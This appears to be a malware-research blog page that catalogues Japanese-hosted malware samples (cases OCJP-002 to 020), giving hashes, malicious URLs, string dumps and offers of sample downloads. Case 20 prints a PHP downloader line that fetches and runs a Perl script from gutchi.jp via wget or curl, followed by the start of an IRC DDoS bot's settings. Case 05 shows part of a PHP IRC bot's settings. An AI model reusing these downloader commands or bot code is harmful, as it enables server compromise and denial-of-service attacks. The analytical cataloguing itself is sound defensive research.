R17.0 VEL19 acad2008 R17.1 VEL20 acad2009 R17.2 VEL21 acad2010 R18.0 VEL22 Unicode Strings:


File: stL1.rar MD5: ecb3012685ac3c803817999dee39712c Size: 249856 Ascii Strings: --------------------------------------------------------------------------- !This program cannot be run in DOS mode. RPWQ MFC42.DLL atol __CxxFrameHandler free malloc MSVCRT.dll __dllonexit _onexit _exit _XcptFilter exit _acmdln __getmainargs _initterm __setusermatherr _adjust_fdiv __p__commode __p__fmode __set_app_type _except_handler3 _controlfp GetVersionExA CloseHandle VirtualFreeEx ReadProcessMemory WriteProcessMemory VirtualAllocEx OpenProcess SetFileTime WriteFile SetFilePointer CreateFileA GetTickCount Sleep DeleteFileA GetSystemDirectoryA CreateProcessA GetWindowsDirectoryA GetTempPathA ReadFile GetFileSize GetModuleFileNameA GetCommandLineA GetLastError GetCurrentProcess GetModuleHandleA GetStartupInfoA KERNEL32.dll FindWindowExA FindWindowA ClientToScreen SendMessageA GetWindowThreadProcessId PtInRect PeekMessageA InflateRect SetCursorPos GetParent GetWindowTextA WindowFromPoint GetWindowRect mouse_event GetSystemMetrics GetCursorPos PostMessageA ScreenToClient ExitWindowsEx USER32.dll QueryServiceStatus CloseServiceHandle OpenServiceA OpenSCManagerA RegCloseKey RegQueryValueExA RegSetValueExA RegOpenKeyExA AdjustTokenPrivileges LookupPrivilegeValueA OpenProcessToken RegCreateKeyA ADVAPI32.dll _setmbcp Iprip le.bin\ c:\$Re led\ c:\re 500,260,326,227,326,227,500,372,87,270,434,340,350,450,90,335,285,415,408,234,340,200,340,200,8, ToolbarWindow32 SysPager TrayNotifyWnd Shell_TrayWnd .dll \fsu .inf \inf\opt .log \ken .dat ny45ic -OFF Adobe C:\Program Files\Common Files\ RunOnce\ -ONCE .exe SOFTWARE\Microsoft\Windows\CurrentVersion\ SeShutdownPrivilege SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{BF50AC63-19DA-487E-AD4A-0B452D823B59}\ SOFTWARE\Classes\CLSID\{BF50AC63-19DA-487E-AD4A-0B452D823B59}\InprocServer32\ Flags Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{BF50AC63-19DA-487E-AD4A-0B452D823B59}\

File: vel19.rar MD5: 28663dc50d4400e05de15db7cffcbb79 Size: 73728 Ascii Strings: --------------------------------------------------------------------------- !This program cannot be run in DOS mode. /fresh \styzwt.exe BLOD DZAX19 acd07.agp sou.com/ct http RTUL RTNM DWORD CString Version Vector\ Internet Explorer\ HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ http:// HKEY_CURRENT_USER\SOFTWARE\Autodesk\AutoCAD\ HKEY_LOCAL_MACHINE\SOFTWARE\Autodesk\AutoCAD\ invalid map/set<T> iterator HKEY_LOCAL_MACHINE bad allocation CWindoTypeDlg FSHS CUDA SJBC ToolbarWindow32 SysPager TrayNotifyWnd Shell_TrayWnd EXCNM SeShutdownPrivilege MSIE 8.0) MSIE 7.0) MSIE 6.0) Mozilla/4.0 (compatible; Referer: Accept: text/html, */* Accept-Language: zh-cn Accept-Encoding: gzip, deflate Content-Type: text/xml vpage= AcadLocation CurVer acad2011 R18.1 acad2010 R18.0 acad2009 R17.2 acad2008 R17.1 acad2007 R17.0 acad2006 R16.2 acad2005 R16.1 acad2004 R16.0 acad2000 R15.0 kernel32 IsWow64Process le.bin\ c:\$Re led\ c:\re .fas .lsp \support\ to\command= shell\Auexecute=shell oRun] [Aut .exe .dat open= Run.inf Auto .dll \*.* HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{BF50AC63-19 DA-487E-AD4A-0B452D823B59}\InprocServer32\ HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BF50AC63-19 Flags DA-487E-AD4A-0B452D823B59}\ HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{BF50AC63-19 \fsu QDZQ HKEY_LOCAL_MACHINE\SOFTWARE auk0 Iprip RUN2- RUN64-2- -OFF -ONCE Adobe RunOnce\ RUN1- RUN64-1- kingsoft system32 rising kasper 360sa Run\ SOFTWARE\Microsoft\Windows\CurrentVersion\ DWQJ19 DWQJ%# \support\vel.arx \whohas.arx Unicode Strings: --------------------------------------------------------------------------- DynamicLinker ClassDictionary AcApDocManagerReactor BwwsHGK([b+M}~ 030195318 wind MS Sans Serif Button1 Ch7_1 VS_VERSION_INFO StringFileInfo 040904b0 FileDescription AUTOCAD ObjectARX application FileVersion 0, 0, 17, 0 InternalName LegalCopyright Copyright 1999 OriginalFilename vel.arx ProductName VEL Application ProductVersion

 2012-02-26 Case 20 ◘  WordPress theme vuln - PHP downloader and Perl IRC DDoS Trojan.IRC-BOT IRC-FLooder/Backdoor

ANALYSIS:   #OCJP-020：malware Perl and PHP sites via IRC (gutchi.jp/210.157.5.15) vulnerabilities in WordPress Service

 There were a number of Wordpress theme vulnerabilities such as listed below

 CVE-2011-3863 , CVE-2011-3862 , CVE-2011-3861 CVE-2011-3863 , CVE-2011-3862 , CVE-2011-3861
CVE-2011-3860 , CVE-2011-3858 , CVE-2011-3857 CVE-2011-3860 , CVE-2011-3858 , CVE-2011-3857
CVE-2011-3856 , CVE-2011-3855 , CVE-2011-3854 CVE-2011-3856 , CVE-2011-3855 , CVE-2011-3854
CVE-2011-3853 , CVE-2011-3852 , CVE-2011-3851 CVE-2011-3853 , CVE-2011-3852 , CVE-2011-3851
CVE-2011-3850 CVE-2011-3850 

It was in the news in the beginning of August 2011 as many sites were scanned and exploited.

 Download (email me if you need the password scheme)

File: pani2.jpg
MD5:  849927dae774a1909ae6e27c1c3a8869
Size: 2771

Ascii Strings:
---------------------------------------------------------------------------
<?php
@passthru('cd /tmp;wget http://gutchi.jp/wp//wp-content/themes/delicate/cache/unix.txt;perl unix.txt;rm -rf unix.txt*');
@passthru('cd /tmp;curl -O http://gutchi.jp/wp//wp-content/themes/delicate/cache/unix.txt;perl unix.txt;rm -rf unix.txt*');
... etc


---------------------------------------------------------------------------
#!/usr/bin/perl
#   PENGATURAN
#############################################################################
my $server   = "multiplay.uk.quakenet.org";
my $port     = "6667";
my $channel  = "#marxone";
my $owner    = "marxone","ugal";
my $procname = "/usr/sbin/httpd";
my $qqum     = "*";
# SOURCE
#############################################################################
my @nickname =

 2012-02-18 Case 19 ◘  Remote Desktop Spyware

ANALYSIS:   #OCJP-019： Remote Desktop spyware

hxxp://huaidan.org/wp-content/uploads/200708/clear3389.rar hxxp :/ / huaidan.org/wp-content/uploads/200708/clear3389.rar 

huaidan.org / 106.187.42.180

File: clear3389.exe
Size: 32768
MD5:  A695473047830E6071BC440DC6AB88C3

Virustotal  

File: clear3389.rar
Size: 12986
MD5:  9F9849BA2B9273C821CAF8C29C9B5619

 Download (email me if you need the password scheme)

 2012-02-18 Case 18 ◘  VBS.Redlof.A

ANALYSIS:   #OCJP-018：  VBS.Redlof.A

File: index.html
Size: 12069
MD5:  6E9F8D2A5D151E1CB1E78945B48C2369

Virustotal 

Symantec Redlof.A

 Download (email me if you need the password scheme)

 2012-02-17 Case 17 ◘  Fraud.FakeTimer-2

ANALYSIS:   #OCJP-017： Fraud.FakeTimer-2

File: sp_k_test.apk
Size: 80119
MD5:  079B92DF0DA0E57C3DFCD5B8D0D2C82C

Virustotal 

Symantec Redlof.A

 Download (email me if you need the password scheme)

 2012-02-16 Case 16 ◘ ZeroAccess / Virus.Win32.ZAccess.k

ANALYSIS:  #OCJP-016 221.251.54.213 mayaweb.jp network in Japan

hxxp :/ / s3.mayaweb.jp/videoplayer/shock/Play_Video_Click_Run.exe

File: Play_Video_Click_Run.exe
Size: 221696
MD5:  065EFD579429DE85C9A0C55DF7E8CABE

Looks like Hendrik ran into a newer sample of ZeroAccess Rootkit than we already have posted here: contagio: ZeroAccess / Max++ / Smiscer Crimeware Rootkit sample

Driver

 \SystemRoot\System32\drivers\afd.sys

Virustotal 

 Download (pass infected on this one)

 2012-02-15 Case 15 ◘  Ramnit

ANALYSIS:  #OCJP-015 Infectiuous Ramnit HTML in Japan

 File: index.html
Size: 882533
MD5:  60472C8443D8888A60BD5074C3BEE62A

Virustotal

File: svchost.exe  - Ramnit
Size: 433615
MD5:  5C282CC69B8932AB64E6DD2F29F64309

Virustotal  

 Download (email me if you need the password scheme)

 2012-02-14 Case 14 ◘  Trojan Hupigon

ANALYSIS:   #OCJP-014：  Win32.Hupigon

File: 87000.exe
Size: 269312
MD5:  D5E77BA8646906FD8AA42627060E5E42

Virustotal 

hxxp :/ / qhfl880.net/down/87000.exe
hxxp://xogml.net/down/87000.exe

 Download (email me if you need the password scheme)

 2012-02-13 Case 13 ◘ Autorun worm + Trojan Pincav

ANALYSIS:   #OCJP-013：  Autorun worm + PincAV  IP "211.121.253.132"

File: vel19.rar  - Autorun worm
Size: 73728
MD5:  5FEDEC6191864124B1B89B8428F1941AVirustotal

File: set.rar - Trojan Pincav
Size: 28672
MD5:  642EF29E0194075C830D0F2A418D8FCE
Virustotal 

hxxp://211.121.253.132/vct/set.rar
hxxp://211.121.253.132/vct/vel19.rar

 Download (email me if you need the password scheme)

 2012-02-12 Case 12 ◘ Trojan Vundo.IB

ANALYSIS:   #OCJP-012： Win32-Trojan-Dropper Vundo.IB to discover: (126.117.65.146/SoftbankBB/BBTEC provider IP)

File: yyy.exe
Size: 63108
MD5:  59E3791E05EFA1B04403349BEDBA9F7B

• Wikipedia - Trojan Vundo family
  This family uses advanced defensive and stealth techniques to escape detection and to hinder removal. 
• Virustotal
• Threatexpert

 Download (email me if you need the password scheme)

 2012-02-11 Case 11 ◘ Javascript redirector

ANALYSIS:   #OCJP-011： searchnavi.jp（61.194.62.161）にTROJAN-JAVASCRIPT-REDIRECTOR

File: index.html
Size: 6791MD5:  4210F1541D9D16772D82C2D0AAE1C512

• Virustotal
• Jsunpack http://jsunpack.jeek.org/?report=a7ae07bf0dcdb8e565099fa37abdce6aefb3874e
• JSfiddle http://jsfiddle.net/vffLz/

 Download (email me if you need the password scheme)

 2012-02-10 Case 10 ◘ Android Malware - Fake timer

ANALYSIS: #OCJP-010： 14243444.comとbananaxxx.maido3.com（206.223.148.230）

A sample of android spyware the detected in Japanese rental server office, which is using US data
center. This sample will be also posted on Contagiominidump.blogspot.com for mobile malware collection

hxxp://www.14243444.com/appli02.php
hxxp://14243444.com/appli02.php
hxxp://206.223.148.230/~pj629g01/appli02.php
hxxp://banana8310.maido3.com/~pj629g01/appli02.php
hxxp://banana3247.maido3.com/~pj629g01/appli02.php

File: sp_ntm.apk
Size: 80060
MD5:  44D31414A63A090E5A54670C33E0D1BC

Virustotal

Download (pass infected on this sample)

The scheme, as described by Hendrik, is as follow>

It is a timer application that will connect to the adult site to download adult videos.
Once it starts, it collects system data. Runs as process as http client, performs sync to the adult site and sends user data - google/smartphone information to the adult site, which is triggered by timers.
 

 2012-02-08 Case 08 ◘ Trojan Downloader PWS:Win32/OnLineGames.FR

ANALYSIS:  #OCJP-008： LODA.JP ( 14.132.14.164)

Microsoft - PWS:Win32/OnLineGames.FR
PWS:Win32/OnLineGames.FR is a trojan that steals passwords and other sensitive information. It can also download arbitrary files from certain Web servers.

File: TWCI.scr
Size: 290279
MD5:  CD565746CAC0AA7FA151EAC39013EA0E
Virustotal

Download (email me if you need the password scheme)

  

 2012-02-03 Case 07 ◘ Trojan Downloader + Spyware/infostealer

ANALYSIS: #OCJP-007: Qhfl880.net & xogml.net "sqlsrvt.exe" Trojan (27.125.204.59), the data center site @ Japan South Korea

File: sqlservt.exe
Size: 392192
MD5:  229A26C15B3E7AFC26F953E43120C723

Virustotal sqlservt.exe

File: bb.exe
Size: 447270
MD5:  6858EC96B6ADB0F3D94911A46AA817A5

Virustotal bb.exe

Download (email me if you need the password scheme)

 2012-02-02 Case 06 ◘ Keylogger "Perfect Keylogger"

ANALYSIS: #OCJP-006: dl.volamviet.vn（49.212.32.185）Vietnam site keylogger

PerfectKeylogger

File: VAutoF2.0.13.exe
Size: 3026829
MD5:  1A835E32B1FEF966E4924B2C6895099C
CleanMX
Virustotal

 Download (email me if you need the password scheme)

  

 2011-02-02 Case 05 ◘ IRC PHP DDoS bot

ANALYSIS: Server (210.172.144.27) tools PHP-IRC backdoor and DDoS attacks have been discovered in Ware asakusa-kagetudo.com

File: 10.jpg
Size: 42942
MD5:  FCCCDB4FB0EEA30C029724C1EB60BAFE
Virustotal

File: 11.jpg
Size: 42923
MD5:  E192A8B06F3606EB5B4438D96B4289F2

Virustotal

Strings

+---------------------------------------------+
|#############################################|
|#[ bot PHP version IRC v5.5
            ]#|
|#[ By Jancok  
            ]#|
|#[ 2010 lebay Community
            ]#|
|#[ irc: #lebay @ jancok.org                ]#|
|#############################################|
+---------------------------------------------+
function rx() {
/* Channel JupIt3r */
$channels = '#ornamen'; // chanell pisahkan dengan spasi
/*** Admin ***/
$admin = 'r4puh';
$JupIt3r_password = 'nik'; //Password untuk auth JupIt3r
$localtest = 0; //1, Coba di localhost. 0, connect ke server irc
$showrespone = 0; //1, Nampilin respon dari server irc
//Nick JupIt3r

Download (email me if you need the password scheme)

 2011-12-27 Case 04 ◘ FakeAV

ANALYSIS: #OCJP-004: gisa-japan.org(203.183.242.158) FakeAV

File: 42d58f2ac633da96a50607f45e254f08.exe
Size: 440576
MD5:  42D58F2AC633DA96A50607F45E254F08
Virustotal

Download (email me if you need the password scheme)

  

 2012-01-29 Case 03 ◘ Chinese Trojan Backdoor Dropper Win32/Trojan/Binder

ANALYSIS: #OCJP-003 diybbb.com Dropper, Backdoor, Downloader Chinese Trojan Backdoor Win32/Trojan/FLyStudio

File: 8eef0a7b25c397a3c14179563c8a0f49.exe
Size: 870186
MD5:  8EEF0A7B25C397A3C14179563C8A0F49

Anubis analysis
Virustotal

Download (email me if you need the password scheme)

 

2011-12-27 Case 02 ◘ Trojan Downloader Seleya/Swisyn

ANALYSIS: Case 02 #OCJP-002: tenmienre.org & 13xu.com

File: sever.exe
Size: 191488
MD5:  8B71F88CC08118D1FF4AA6008DC35A5F

Virustotal

Download (email me if you need the password scheme)